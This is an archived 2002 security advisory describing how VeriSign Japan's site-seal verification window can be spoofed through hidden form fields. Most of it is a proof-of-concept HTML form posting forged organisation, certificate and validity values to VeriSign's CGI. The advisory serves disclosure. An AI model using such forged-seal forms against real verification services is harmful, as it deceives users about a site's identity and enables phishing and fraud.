Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: web5506.htm

Verisign seal can be falsified



3rd Jul 2002 [SBWID-5506]
COMMAND

	Verisign seal can be falsified

SYSTEMS AFFECTED

	Problem is reported in the Japanese version  of  VeriSign  seals.  Other
	versions at risk ??

PROBLEM

	Thanks to vagabond [http://www.vagabond.co.jp]  findings,  Noam  Rathaus
	[http://www.beyondsecurity.com] posted :
	

	VeriSign\'s Seal displays parameters when it  transfers  them  from  the
	form  to  CGI  script.  At  this  point  the  company  name  and   other
	information used in authentication, which is  hidden  in  the  form  but
	displayed when the authentication process is complete,  is  transferred.
	Thus, the authentication window used by VeriSign\'s seal can be  spoofed
	by preparing  a  page  set  with  the  hidden  elements  containing  the
	information the attacker wants to spoof.
	

	

	 Exploit

	 =======

	

	Appended below is the source code for the VeriSign form.  Virtually  all
	of  the  hidden  information  can  be  rewritten.  All  of  the  content
	rewritten  onto  VeriSign  Japan\'s  authentication  window  is  clearly
	displayed.
	

	

	<INPUT type=hidden name=\"VS_ORGANIZATION\" value=\"USO-DAPYON\">

	

	For example, \"USO-DAPYON\" in value =\"USO-DAPYON\" in the above string can be

	displayed by rewriting it to a different character string.

	

	<FORM NAME=form1 METHOD=POST

	ACTION=\"https://www.verisign.co.jp/cgi-bin/Seal.exe\"><INPUT type=hidden

	name=\"VHTML_FILE\" value=\"../htmldocs/query/authCertDisplay.htm\">

	<INPUT type=hidden name=\"STATUS\" value=\"0\">

	<INPUT type=hidden name=\"qmRowOffset\" value=\"\">

	<INPUT type=hidden name=\"qmStartRecNumber\" value=\"\">

	<INPUT type=hidden name=\"qmRecNumber\" value=\"\">

	<INPUT type=hidden name=\"VS_ORGANIZATION\" value=\"USO-DAPYON\">

	<INPUT type=hidden name=\"form_file\" value=\"../fdf/authCertByIssuer.fdf\">

	<INPUT type=hidden name=\"PIPE\" value=\"QUERY_MANAGER\">

	<INPUT type=hidden name=\"VS_VALID_END\" value=\"99-MAR-99\">

	<INPUT type=hidden name=\"qmCompileAlways\" value=\"yes\">

	<INPUT type=hidden name=\"unstructured_addr\" value=\"\">

	<INPUT type=hidden name=\"CERT_MSG\" value=\"\">

	<INPUT type=hidden name=\"VS_CERT_SERIAL\" value=\"\">

	<INPUT type=hidden name=\"VS_CERT_FLAGS\" value=\"0\">

	<INPUT type=hidden name=\"VS_STATUS\" value=\"Valid\">

	<INPUT type=hidden name=\"url_encode\" value=\"no\">

	<INPUT type=hidden name=\"issuerSerial2\" value=\"\">

	<INPUT type=hidden name=\"SDATE\" value=\"\">

	<INPUT type=hidden name=\"ip_address\" value=\"172.16.185.00\">

	<INPUT type=hidden name=\"VS_SUBJECT_READABLE\" value=\"Country = JP<BR>State =

	Tokyo<BR>Locality = USO <BR>Organizational Unit = Terms of use at

	www.verisign.co.jp/RPA (c)00<BR>Organizational Unit = Authenticated by

	VeriSign Japan K.K.<BR>Organizational Unit = Member, VeriSign Trust

	Network<BR>Organization = USO Inc.<BR>Organizational Unit = Web System

	Div.<BR>Common Name = www.USO-DAPYON.co.jp\">

	<INPUT type=hidden name=\"qmStartRecNumber\" value=\"1\">

	<INPUT type=hidden name=\"application\" value=\"Mozilla/4.78 [ja] (Windows NT

	5.0; U)\">

	<INPUT type=hidden name=\"qmRecNumber\" value=\"2\">

	<INPUT type=hidden name=\"VS_PRODUCT_NAME\" value=\"Digital ID Class 3 -

	Affiliate Global Server AuthCenter\">

	<INPUT type=hidden name=\"remote_host\"

	value=\"https://www.verisign.co.jp/cgi-bin/siteseal.exe\">

	<INPUT type=hidden name=\"common_name\" value=\"\">

	<INPUT type=hidden name=\"error_status\" value=\"4000\">

	<INPUT type=hidden name=\"VS_VALID_START\" value=\"99-MAR-99\">

	<INPUT type=hidden name=\"card_expire\" value=\"\">

	<INPUT type=hidden name=\"Template\" value=\"authCertByIssuer\">

	<INPUT type=hidden name=\"issuerSerial\" value=\"\">

	<INPUT type=hidden name=\"ENDDATE\" value=\"\">

	<INPUT type=hidden name=\"server_URL\"

	value=\"https://servicecenter.verisign.com\">

	<INPUT type=hidden name=\"VS_COMMON_NAME\" value=\"WWW.USO-DAPYON.CO.JP\">

	<INPUT type=hidden name=\"END\" value=\"YES\">

	<INPUT SRC=\"https://www.verisign.co.jp/images/siteseal/VeriSignSeal.gif\"

	TYPE=\"image\" border=0></FORM>

	

SOLUTION

	??


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH